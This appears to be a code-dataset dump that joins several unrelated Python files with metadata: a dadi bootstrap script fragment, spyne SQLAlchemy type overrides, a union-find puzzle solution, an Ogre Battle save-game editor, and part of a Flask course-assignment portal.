datadict[chrom][order_pos] = {}
datadict[chrom][order_pos][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
else:
datadict[chrom][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
total_variants_chrom[chrom] += 1
if not os.path.exists(opt.prefix):
os.makedirs(opt.prefix)
# list_pops = ['TIB', 'HANN', 'HANS']
list_pops = [x.strip() for x in opt.poplist.split(',')]
list_pojections = [int(x.strip()) for x in opt.projections.split(',')]
if not opt.window: datadict_bootstrap={}
with open(os.path.join(opt.prefix, 'generate_sfs_segments.log'), 'w') as file_write:
for chrom in datadict:
if opt.window:
print('Simulation #%s start' % chrom)
for order_pos in datadict[chrom]:
fs = dadi.Spectrum.from_data_dict(data_dict=datadict[chrom][order_pos],
pop_ids=list_pops,
projections=list_pojections,
polarized=opt.unfold)
if not os.path.exists(os.path.join(opt.prefix, chrom)):
os.makedirs(os.path.join(opt.prefix, chrom))
fs.to_file(os.path.join(opt.prefix, chrom, chrom + '-' + str(order_pos) + '.fs'))
file_write.writelines('%s\t%d\t%d\n' %(chrom, order_pos, len(datadict[chrom][order_pos])))
else:
window = total_variants_chrom[chrom]/100
list_keys = list(datadict[chrom].keys())
if opt.random:
random.shuffle(list_keys)
index_variant = 0
for key_variant in list_keys:
# pos = int(key_line.split('-')[1])
index_variant += 1
order_pos = math.floor(index_variant / window)
if order_pos not in datadict_bootstrap:
datadict_bootstrap[order_pos] = {}
# print(key_variant,'--',datadict[chrom][key_variant],'--',str(order_pos))
datadict_bootstrap[order_pos][key_variant] = datadict[chrom][key_variant]
if not opt.window:
index_bootstrap = 0
list_keys = list(datadict_bootstrap.keys())
while index_bootstrap < 100:
index_bootstrap += 1
print('Bootstrap #%d start' % index_bootstrap)
list_keys_bootstrap = random.choices(list_keys, k=100)
set_keys_bootstrap = set(list_keys_bootstrap)
dict_to_spectrum = {}
for order_pos in set_keys_bootstrap:
group_order_pos = list_keys_bootstrap.count(order_pos)
for index_group in range(group_order_pos):
for key_variant in datadict_bootstrap[order_pos]:
dict_to_spectrum[key_variant + '-' + str(index_group)] = datadict_bootstrap[order_pos][key_variant]
with open(os.path.join(opt.prefix, "datadict."+str(index_bootstrap)+".txt"), 'w') as outfile:
for x, y in dict_to_spectrum.items():
outfile.write(x + str(y) + "\n")
fs = dadi.Spectrum.from_data_dict(data_dict=dict_to_spectrum,
pop_ids=list_pops,
projections=list_pojections,
polarized=opt.unfold)
fs.to_file(os.path.join(opt.prefix, str(index_bootstrap) + '.fs'))
file_write.writelines('%d\t%d\n' %(index_bootstrap, len(dict_to_spectrum)))
print(str(len(dict_to_spectrum)))
|
en
| 0.086227
|
# limit_variants = 10000 # index_variant = 0 # print(line) # print(key_line,'--',val_line) # list_pops = ['TIB', 'HANN', 'HANS'] #%s start' % chrom) # pos = int(key_line.split('-')[1]) # print(key_variant,'--',datadict[chrom][key_variant],'--',str(order_pos)) #%d start' % index_bootstrap)
| 2.527751
| 3
|
spyne/store/relational/override.py
|
edustaff/spyne
| 786
|
6628516
|
#
# spyne - Copyright (C) Spyne contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.dialects.postgresql import INET
from spyne.store.relational import PGXml, PGJson, PGHtml, PGJsonB, \
PGObjectJson, PGFileJson
@compiles(PGXml)
def compile_xml(type_, compiler, **kw):
return "xml"
@compiles(PGHtml)
def compile_html(type_, compiler, **kw):
return "text"
@compiles(PGJson)
def compile_json(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(PGJsonB)
def compile_jsonb(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(PGObjectJson)
def compile_ojson(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(PGFileJson)
def compile_fjson(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(INET)
def compile_inet(type_, compiler, **kw):
return "inet"
@compiles(PGXml, "firebird")
def compile_xml_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGHtml, "firebird")
def compile_html_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGJson, "firebird")
def compile_json_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGJsonB, "firebird")
def compile_jsonb_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGObjectJson, "firebird")
def compile_ojson_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGFileJson, "firebird")
def compile_fjson_firebird(type_, compiler, **kw):
return "blob"
@compiles(INET, "firebird")
def compile_inet_firebird(type_, compiler, **kw):
# http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/netinet_in.h.html
# INET6_ADDRSTRLEN
return "varchar(45)"
|
#
# spyne - Copyright (C) Spyne contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.dialects.postgresql import INET
from spyne.store.relational import PGXml, PGJson, PGHtml, PGJsonB, \
PGObjectJson, PGFileJson
@compiles(PGXml)
def compile_xml(type_, compiler, **kw):
return "xml"
@compiles(PGHtml)
def compile_html(type_, compiler, **kw):
return "text"
@compiles(PGJson)
def compile_json(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(PGJsonB)
def compile_jsonb(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(PGObjectJson)
def compile_ojson(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(PGFileJson)
def compile_fjson(type_, compiler, **kw):
return type_.get_col_spec()
@compiles(INET)
def compile_inet(type_, compiler, **kw):
return "inet"
@compiles(PGXml, "firebird")
def compile_xml_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGHtml, "firebird")
def compile_html_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGJson, "firebird")
def compile_json_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGJsonB, "firebird")
def compile_jsonb_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGObjectJson, "firebird")
def compile_ojson_firebird(type_, compiler, **kw):
return "blob"
@compiles(PGFileJson, "firebird")
def compile_fjson_firebird(type_, compiler, **kw):
return "blob"
@compiles(INET, "firebird")
def compile_inet_firebird(type_, compiler, **kw):
# http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/netinet_in.h.html
# INET6_ADDRSTRLEN
return "varchar(45)"
|
en
| 0.837478
|
# # spyne - Copyright (C) Spyne contributors. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 # # http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/netinet_in.h.html # INET6_ADDRSTRLEN
| 1.641485
| 2
|
solutions/problem_240.py
|
bssrdf/daily-coding-problem
| 0
|
6628517
|
#I think, at the most, `n-1` moves should be sufficient.
class Solution(object):
def minSwapsCouples(self, row):
"""
:type row: List[int]
:rtype: int
"""
n = len(row)//2
self.count = n
roots = [i for i in range(n)]
def find(i):
while roots[i] != i:
roots[i] = roots[roots[i]]
i = roots[i]
return i
def union(i, j):
x, y = find(i), find(j)
if x != y:
roots[x] = y
self.count -= 1
for i in range(n):
a = row[2*i]
b = row[2*i + 1]
union(a, b)
return n - self.count
if __name__=="__main__":
print(Solution().minSwapsCouples([0, 1, 0, 1]))
|
#I think, at the most, `n-1` moves should be sufficient.
class Solution(object):
def minSwapsCouples(self, row):
"""
:type row: List[int]
:rtype: int
"""
n = len(row)//2
self.count = n
roots = [i for i in range(n)]
def find(i):
while roots[i] != i:
roots[i] = roots[roots[i]]
i = roots[i]
return i
def union(i, j):
x, y = find(i), find(j)
if x != y:
roots[x] = y
self.count -= 1
for i in range(n):
a = row[2*i]
b = row[2*i + 1]
union(a, b)
return n - self.count
if __name__=="__main__":
print(Solution().minSwapsCouples([0, 1, 0, 1]))
|
en
| 0.699259
|
#I think, at the most, `n-1` moves should be sufficient. :type row: List[int] :rtype: int
| 3.231798
| 3
|
src/savestate.py
|
lohathe/ogrebattleHacking
| 0
|
6628518
|
<reponame>lohathe/ogrebattleHacking
import collections
import json
def extractJson(file_name):
with open(file_name, "r") as f:
return json.load(f)
ITEMS = extractJson("data/items.json")
CLASSES = extractJson("data/classes.json")
NAMES = extractJson("data/names.json")
def findInsideList(list_, key, value, default=None):
for el in list_:
if el[key] == value:
return el
return default
def bytes_to_int(data):
# type: (bytes) -> int
assert(isinstance(data, (bytes, bytearray, )))
size = len(data)
res = 0
for i in reversed(range(size)):
res = (res << 8) | (data[i] & 0xFF)
return res
def int_to_bytes(data):
# type: (int) -> bytes
if data < 0:
raise RuntimeError("Cannot convert negative number to bytes!")
res = []
while True:
res.append(data & 0xFF)
data = data >> 8
if data == 0x00:
break
return res
def bytes_to_num(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
return str(bytes_to_int(data))
def num_to_bytes(data):
# type: (str)-> bytes
return int_to_bytes(int(data))
def bytes_to_str(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
i = len(data)-1
while i >= 0 and data[i] == 0:
i = i-1
return data[:i+1].decode("ascii")
def str_to_bytes(data):
# type: (str) -> bytes
# NOTE: 'ascii' can be a little too much conservative...
# NOTE: we are returning `bytes`, and not an `array[int]`, so this function
# can create some problems since they are not exactly the same, but
# hopefully their interface is similar enough to make everything work
return bytes(data, encoding="ascii")
def bytes_to_class(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
res = findInsideList(CLASSES, "value", bytes_to_int(data), {"name": "unknown"})
return res["name"]
def class_to_bytes(data):
# type: (str) -> bytes
res = findInsideList(CLASSES, "name", data, {"value": 0})
return int_to_bytes(res["value"])
def bytes_to_name(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
res = findInsideList(NAMES, "value", bytes_to_int(data), {"name": "unknown"})
return res["name"]
def name_to_bytes(data):
# type: (str) -> bytes
res = findInsideList(NAMES, "name", data, {"value": 0})
return int_to_bytes(res["value"])
def bytes_to_item(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
if bytes_to_int(data) == 0:
return "none"
res = findInsideList(ITEMS, "value", bytes_to_int(data), {"name": "unknown", "descr": ""})
return res["name"]
def item_to_bytes(data):
# type: (str) -> bytes
if data == "none":
return [0x00]
res = findInsideList(ITEMS, "name", data, {"value": 0})
return int_to_bytes(res["value"])
ReadData = collections.namedtuple("ReadData",
("name", "value", "formatted", "raw", "address"))
class OgreBattleSaveState(object):
"""
Mapping the bytes inside the save state for "Ogre Battle: MofBQ".
"""
START_ADDRESS = 0x0001
SLOT_SIZE = 0xAAA
OPINION_LEADER_NAME_REF = 0x07a4
# offset, size, number of items, field name, deserialize func, serialize func
UNIT_LAYOUT = [
(0x0069, 1, 100, "CLASS", bytes_to_class, class_to_bytes),
(0x0131, 1, 100, "LVL", bytes_to_num, num_to_bytes),
(0x0195, 1, 100, "EXP", bytes_to_num, num_to_bytes),
(0x01f9, 2, 100, "HP", bytes_to_num, num_to_bytes),
(0x02c1, 1, 100, "STR", bytes_to_num, num_to_bytes),
(0x0325, 1, 100, "AGI", bytes_to_num, num_to_bytes),
(0x0389, 1, 100, "INT", bytes_to_num, num_to_bytes),
(0x03ed, 1, 100, "CHA", bytes_to_num, num_to_bytes),
(0x0451, 1, 100, "ALI", bytes_to_num, num_to_bytes),
(0x04b5, 1, 100, "LUK", bytes_to_num, num_to_bytes),
(0x0519, 2, 100, "COST", bytes_to_num, num_to_bytes),
(0x05e1, 1, 100, "ITEM", bytes_to_item, item_to_bytes),
(0x0645, 2, 100, "NAME", bytes_to_name, name_to_bytes),
(0x070d, 1, 100, "GROUP ROSTER", bytes_to_num, num_to_bytes),
(0x0771, 1, 25, "x9?", bytes_to_num, num_to_bytes),
]
GROUPS_LAYOUT = [
(0x078a, 1, 125, "units formation", bytes_to_num),
(0x0807, 1, 125, "units barraks", bytes_to_num),
(0x0000, 0, 0, "is group leader", bytes_to_num),
]
MISC_LAYOUT = [
(0x0aa8, 2, 1, "CHECKSUM", bytes_to_num, num_to_bytes),
(0x0910, 8, 1, "LEADER_NAME", bytes_to_str, str_to_bytes),
(0x092b, 3, 1, "MONEY", bytes_to_num, num_to_bytes),
(0x092f, 1, 1, "REPUTATION", bytes_to_num, num_to_bytes),
]
def __init__(self, file, index):
if index not in (0, 1, 2):
raise RuntimeError(f"Slot '{index}' does not exists in snes!")
self.file = file
self.index = index
self.data = []
with open(file, "rb") as f:
start = (OgreBattleSaveState.START_ADDRESS +
OgreBattleSaveState.SLOT_SIZE*index)
size = OgreBattleSaveState.SLOT_SIZE
f.seek(start)
self.data = bytearray(f.read(size))
if len(self.data) != OgreBattleSaveState.SLOT_SIZE:
raise RuntimeError(
f"problem reading slot {index} of file {file}: " +
f"read {len(self.data)} bytes instead of {size}")
# update the name of the opinion leader
offset, size, _1, info_name, serialize, _2 = self.MISC_LAYOUT[1]
assert(info_name == "LEADER_NAME")
try:
leader_name = serialize(self.data[offset:offset+size])
except Exception as e:
# in case the slot is empty the bytes that should contain the
# leader's name are filled with non-ascii bytes!
leader_name = "unknown"
NAMES.append({
"value": self.OPINION_LEADER_NAME_REF,
"name": leader_name,
})
def _find_info_entry(self, target, info_name):
INFOS = {
"UNIT": OgreBattleSaveState.UNIT_LAYOUT,
"MISC": OgreBattleSaveState.MISC_LAYOUT,
}
if target not in INFOS:
raise RuntimeError(f"Layout for '{target}' not found!")
entry = [x for x in INFOS[target] if x[3] == info_name]
if len(entry) != 1:
raise RuntimeError(f"Found {len(entry)} of '{info_name}' inside '{target}'!")
return entry[0]
def get_info(self, info_target, info_name, stride=0):
offset, size, max_stride, _1, deserialize, _2 = self._find_info_entry(info_target, info_name)
if stride >= max_stride:
raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
address = offset + stride*size
abslute_address = (OgreBattleSaveState.START_ADDRESS +
self.index*OgreBattleSaveState.SLOT_SIZE) + address
bytes_ = self.data[address:address+size]
res = ReadData(
name=info_name,
value=bytes_to_int(bytes_),
formatted=deserialize(bytes_),
raw=bytes_,
address=abslute_address,
)
return res
def set_info(self, new_value, info_target, info_name, stride=0):
offset, size, max_stride, _1, _2, serialize = self._find_info_entry(info_target, info_name)
if stride >= max_stride:
raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
address = offset + stride*size
bytes_ = serialize(new_value)
if len(bytes_) > size:
raise RuntimeError(f"Bad size for '{info_name}': '{new_value}'->'{bytes_}'")
# during serialization we do not know the expected number of bytes to
# fill, but here we do. Hopefully padding with zeroes is always ok!
while len(bytes_) < size:
bytes_.append(0)
self.data[address:address+size] = bytes_
def get_unit_info(self, unit_index, info_name):
return self.get_info("UNIT", info_name, stride=unit_index)
def set_unit_info(self, unit_index, info_name, new_value):
self.set_info(new_value, "UNIT", info_name, stride=unit_index)
def get_misc_info(self, info_name):
return self.get_info("MISC", info_name)
def set_misc_info(self, info_name, new_value):
self.set_info(new_value, "MISC", info_name)
def get_checksum(self):
return self.get_info("MISC", "CHECKSUM")
def update_checksum(self):
new_checksum = self.compute_checksum().value
self.set_info(new_checksum, "MISC", "CHECKSUM")
def compute_checksum(self):
CHECKSUM_START_ADDRESS = 0x0003 # included
CHECKSUM_END_ADDRESS = 0x0aa8 # excluded
value = 0
for i in range(CHECKSUM_START_ADDRESS, CHECKSUM_END_ADDRESS):
value = (value + self.data[i]) & 0xFFFF
res = ReadData(
name="COMPUTED_CHECKSUM",
value=value,
formatted=str(value),
raw=num_to_bytes(value),
address=0,
)
return res
def save(self):
self.update_checksum()
with open(self.file, "rb") as f:
content = bytearray(f.read())
start = OgreBattleSaveState.START_ADDRESS + self.index*OgreBattleSaveState.SLOT_SIZE
end = start + OgreBattleSaveState.SLOT_SIZE
content[start:end] = self.data
with open(self.file, "wb") as f:
f.write(bytes(content))
|
import collections
import json
def extractJson(file_name):
with open(file_name, "r") as f:
return json.load(f)
ITEMS = extractJson("data/items.json")
CLASSES = extractJson("data/classes.json")
NAMES = extractJson("data/names.json")
def findInsideList(list_, key, value, default=None):
for el in list_:
if el[key] == value:
return el
return default
def bytes_to_int(data):
# type: (bytes) -> int
assert(isinstance(data, (bytes, bytearray, )))
size = len(data)
res = 0
for i in reversed(range(size)):
res = (res << 8) | (data[i] & 0xFF)
return res
def int_to_bytes(data):
# type: (int) -> bytes
if data < 0:
raise RuntimeError("Cannot convert negative number to bytes!")
res = []
while True:
res.append(data & 0xFF)
data = data >> 8
if data == 0x00:
break
return res
def bytes_to_num(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
return str(bytes_to_int(data))
def num_to_bytes(data):
# type: (str)-> bytes
return int_to_bytes(int(data))
def bytes_to_str(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
i = len(data)-1
while i >= 0 and data[i] == 0:
i = i-1
return data[:i+1].decode("ascii")
def str_to_bytes(data):
# type: (str) -> bytes
# NOTE: 'ascii' can be a little too much conservative...
# NOTE: we are returning `bytes`, and not an `array[int]`, so this function
# can create some problems since they are not exactly the same, but
# hopefully their interface is similar enough to make everything work
return bytes(data, encoding="ascii")
def bytes_to_class(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
res = findInsideList(CLASSES, "value", bytes_to_int(data), {"name": "unknown"})
return res["name"]
def class_to_bytes(data):
# type: (str) -> bytes
res = findInsideList(CLASSES, "name", data, {"value": 0})
return int_to_bytes(res["value"])
def bytes_to_name(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
res = findInsideList(NAMES, "value", bytes_to_int(data), {"name": "unknown"})
return res["name"]
def name_to_bytes(data):
# type: (str) -> bytes
res = findInsideList(NAMES, "name", data, {"value": 0})
return int_to_bytes(res["value"])
def bytes_to_item(data):
# type: (bytes) -> str
assert(isinstance(data, (bytes, bytearray, )))
if bytes_to_int(data) == 0:
return "none"
res = findInsideList(ITEMS, "value", bytes_to_int(data), {"name": "unknown", "descr": ""})
return res["name"]
def item_to_bytes(data):
# type: (str) -> bytes
if data == "none":
return [0x00]
res = findInsideList(ITEMS, "name", data, {"value": 0})
return int_to_bytes(res["value"])
ReadData = collections.namedtuple("ReadData",
("name", "value", "formatted", "raw", "address"))
class OgreBattleSaveState(object):
"""
Mapping the bytes inside the save state for "Ogre Battle: MofBQ".
"""
START_ADDRESS = 0x0001
SLOT_SIZE = 0xAAA
OPINION_LEADER_NAME_REF = 0x07a4
# offset, size, number of items, field name, deserialize func, serialize func
UNIT_LAYOUT = [
(0x0069, 1, 100, "CLASS", bytes_to_class, class_to_bytes),
(0x0131, 1, 100, "LVL", bytes_to_num, num_to_bytes),
(0x0195, 1, 100, "EXP", bytes_to_num, num_to_bytes),
(0x01f9, 2, 100, "HP", bytes_to_num, num_to_bytes),
(0x02c1, 1, 100, "STR", bytes_to_num, num_to_bytes),
(0x0325, 1, 100, "AGI", bytes_to_num, num_to_bytes),
(0x0389, 1, 100, "INT", bytes_to_num, num_to_bytes),
(0x03ed, 1, 100, "CHA", bytes_to_num, num_to_bytes),
(0x0451, 1, 100, "ALI", bytes_to_num, num_to_bytes),
(0x04b5, 1, 100, "LUK", bytes_to_num, num_to_bytes),
(0x0519, 2, 100, "COST", bytes_to_num, num_to_bytes),
(0x05e1, 1, 100, "ITEM", bytes_to_item, item_to_bytes),
(0x0645, 2, 100, "NAME", bytes_to_name, name_to_bytes),
(0x070d, 1, 100, "GROUP ROSTER", bytes_to_num, num_to_bytes),
(0x0771, 1, 25, "x9?", bytes_to_num, num_to_bytes),
]
GROUPS_LAYOUT = [
(0x078a, 1, 125, "units formation", bytes_to_num),
(0x0807, 1, 125, "units barraks", bytes_to_num),
(0x0000, 0, 0, "is group leader", bytes_to_num),
]
MISC_LAYOUT = [
(0x0aa8, 2, 1, "CHECKSUM", bytes_to_num, num_to_bytes),
(0x0910, 8, 1, "LEADER_NAME", bytes_to_str, str_to_bytes),
(0x092b, 3, 1, "MONEY", bytes_to_num, num_to_bytes),
(0x092f, 1, 1, "REPUTATION", bytes_to_num, num_to_bytes),
]
def __init__(self, file, index):
if index not in (0, 1, 2):
raise RuntimeError(f"Slot '{index}' does not exists in snes!")
self.file = file
self.index = index
self.data = []
with open(file, "rb") as f:
start = (OgreBattleSaveState.START_ADDRESS +
OgreBattleSaveState.SLOT_SIZE*index)
size = OgreBattleSaveState.SLOT_SIZE
f.seek(start)
self.data = bytearray(f.read(size))
if len(self.data) != OgreBattleSaveState.SLOT_SIZE:
raise RuntimeError(
f"problem reading slot {index} of file {file}: " +
f"read {len(self.data)} bytes instead of {size}")
# update the name of the opinion leader
offset, size, _1, info_name, serialize, _2 = self.MISC_LAYOUT[1]
assert(info_name == "LEADER_NAME")
try:
leader_name = serialize(self.data[offset:offset+size])
except Exception as e:
# in case the slot is empty the bytes that should contain the
# leader's name are filled with non-ascii bytes!
leader_name = "unknown"
NAMES.append({
"value": self.OPINION_LEADER_NAME_REF,
"name": leader_name,
})
def _find_info_entry(self, target, info_name):
INFOS = {
"UNIT": OgreBattleSaveState.UNIT_LAYOUT,
"MISC": OgreBattleSaveState.MISC_LAYOUT,
}
if target not in INFOS:
raise RuntimeError(f"Layout for '{target}' not found!")
entry = [x for x in INFOS[target] if x[3] == info_name]
if len(entry) != 1:
raise RuntimeError(f"Found {len(entry)} of '{info_name}' inside '{target}'!")
return entry[0]
def get_info(self, info_target, info_name, stride=0):
offset, size, max_stride, _1, deserialize, _2 = self._find_info_entry(info_target, info_name)
if stride >= max_stride:
raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
address = offset + stride*size
abslute_address = (OgreBattleSaveState.START_ADDRESS +
self.index*OgreBattleSaveState.SLOT_SIZE) + address
bytes_ = self.data[address:address+size]
res = ReadData(
name=info_name,
value=bytes_to_int(bytes_),
formatted=deserialize(bytes_),
raw=bytes_,
address=abslute_address,
)
return res
def set_info(self, new_value, info_target, info_name, stride=0):
offset, size, max_stride, _1, _2, serialize = self._find_info_entry(info_target, info_name)
if stride >= max_stride:
raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
address = offset + stride*size
bytes_ = serialize(new_value)
if len(bytes_) > size:
raise RuntimeError(f"Bad size for '{info_name}': '{new_value}'->'{bytes_}'")
# during serialization we do not know the expected number of bytes to
# fill, but here we do. Hopefully padding with zeroes is always ok!
while len(bytes_) < size:
bytes_.append(0)
self.data[address:address+size] = bytes_
def get_unit_info(self, unit_index, info_name):
return self.get_info("UNIT", info_name, stride=unit_index)
def set_unit_info(self, unit_index, info_name, new_value):
self.set_info(new_value, "UNIT", info_name, stride=unit_index)
def get_misc_info(self, info_name):
return self.get_info("MISC", info_name)
def set_misc_info(self, info_name, new_value):
self.set_info(new_value, "MISC", info_name)
def get_checksum(self):
return self.get_info("MISC", "CHECKSUM")
def update_checksum(self):
new_checksum = self.compute_checksum().value
self.set_info(new_checksum, "MISC", "CHECKSUM")
def compute_checksum(self):
CHECKSUM_START_ADDRESS = 0x0003 # included
CHECKSUM_END_ADDRESS = 0x0aa8 # excluded
value = 0
for i in range(CHECKSUM_START_ADDRESS, CHECKSUM_END_ADDRESS):
value = (value + self.data[i]) & 0xFFFF
res = ReadData(
name="COMPUTED_CHECKSUM",
value=value,
formatted=str(value),
raw=num_to_bytes(value),
address=0,
)
return res
def save(self):
self.update_checksum()
with open(self.file, "rb") as f:
content = bytearray(f.read())
start = OgreBattleSaveState.START_ADDRESS + self.index*OgreBattleSaveState.SLOT_SIZE
end = start + OgreBattleSaveState.SLOT_SIZE
content[start:end] = self.data
with open(self.file, "wb") as f:
f.write(bytes(content))
|
en
| 0.849485
|
# type: (bytes) -> int # type: (int) -> bytes # type: (bytes) -> str # type: (str)-> bytes # type: (bytes) -> str # type: (str) -> bytes # NOTE: 'ascii' can be a little too much conservative... # NOTE: we are returning `bytes`, and not an `array[int]`, so this function # can create some problems since they are not exactly the same, but # hopefully their interface is similar enough to make everything work # type: (bytes) -> str # type: (str) -> bytes # type: (bytes) -> str # type: (str) -> bytes # type: (bytes) -> str # type: (str) -> bytes Mapping the bytes inside the save state for "Ogre Battle: MofBQ". # offset, size, number of items, field name, deserialize func, serialize func # update the name of the opinion leader # in case the slot is empty the bytes that should contain the # leader's name are filled with non-ascii bytes! # during serialization we do not know the expected number of bytes to # fill, but here we do. Hopefully padding with zeroes is always ok! # included # excluded
| 3.255673
| 3
|
portal/assignment.py
|
jczimmerman/tsct-portal
| 1
|
6628519
|
from flask import Flask, render_template, g, redirect, url_for, Blueprint, request, session, abort
from . import db
from portal.auth import login_required, teacher_required
from . import course
bp = Blueprint("assignment", __name__)
def get_assignment(id):
user_id = session.get('user_id')
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.session_id,
sessions.course_id, courses.teacherid
FROM assignments JOIN sessions ON assignments.session_id = sessions.id
JOIN courses ON sessions.course_id = courses.course_id
WHERE assignments.assignment_id = %s
AND courses.teacherid = %s""",
(id, user_id))
check_teacher = cur.fetchone()
cur.close()
if check_teacher is None:
con.close()
abort(400, """You cannot modify this assignment""")
else:
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.name, assignments.description,
assignments.due_date
FROM assignments
WHERE assignment_id = %s""",
(id,))
assignment = cur.fetchone()
cur.close()
return assignment
@bp.route('/course/<int:course_id>/session/<int:id>/create_assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def create_assignment(id, course_id):
"""Single page view to create an assignment."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.course_id, courses.course_id, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id=sessions.course_id
WHERE sessions.id=%s""",
(id,))
course = cur.fetchone()
cur.close()
if request.method == 'POST':
# Getting all information necessary for creating an assignment
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
total_points = request.form['total_points']
con = db.get_db()
cur = con.cursor()
# Query to actually insert assignment into the database
cur.execute("""
INSERT INTO assignments(session_id, name, description, due_date)
VALUES (%s, %s, %s, %s)""",
(id, name, description, due_date))
g.db.commit()
cur.execute("""SELECT assignment_id from assignments
WHERE session_id = %s
AND name =%s
AND description = %s
AND due_date = %s""",
(id, name, description, due_date))
assignment = cur.fetchone()
cur.execute("""SELECT roster.student_id FROM roster WHERE session_id = %s""",
(id,))
students = cur.fetchall()
for student in students:
cur.execute("""INSERT INTO grades (student_id, assignment_id, total_points)
VALUES (%s, %s, %s) """,
(student['student_id'], assignment['assignment_id'], total_points))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=id, course_id=course_id))
con.close()
return render_template('layouts/assignments/create_assignments.html', course=course)
@bp.route('/course/<int:course_id>/session/<int:id>/assignments', methods=('GET',))
@login_required
def view_assignments(id, course_id):
"""Single page view of all the assignments in a session."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.id, sessions.course_id, courses.course_id,
courses.teacherid, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id = sessions.course_id
WHERE sessions.id=%s AND courses.course_id= %s""",
(id, course_id,))
course = cur.fetchone()
# Query to get all of the asssignments in a session
cur.execute("""
SELECT * FROM assignments
WHERE session_id = %s
ORDER BY assignment_id ASC
""", (id,))
assignments = cur.fetchall()
cur.close()
con.close()
return render_template('layouts/assignments/view_assignments.html', course=course, id=id, assignments=assignments)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/edit-assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def edit_assignments(course_id, session_id, id):
"""Singe page view to edit an assignment."""
assignment = get_assignment(id)
if request.method == 'POST':
# getting all info required to update assignment information
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
con = db.get_db()
cur = con.cursor()
# Query to update the information for an assignment
cur.execute("""
UPDATE assignments SET name = %s, description = %s, due_date= %s
WHERE assignment_id = %s
""", (name, description, due_date, id))
# Query to return directly to whichever session the assignment was from
cur.execute("""
SELECT * FROM assignments
WHERE assignment_id = %s""", (id,))
session_id = cur.fetchone()
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id['session_id'], course_id=course_id))
return render_template('layouts/assignments/edit_assignments.html', assignment=assignment)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/delete', methods=['POST'])
@login_required
@teacher_required
def delete_assignments(id, course_id, session_id):
"""Deletes any unwanted assignments."""
assignment = get_assignment(id)
assignment_id = assignment['assignment_id']
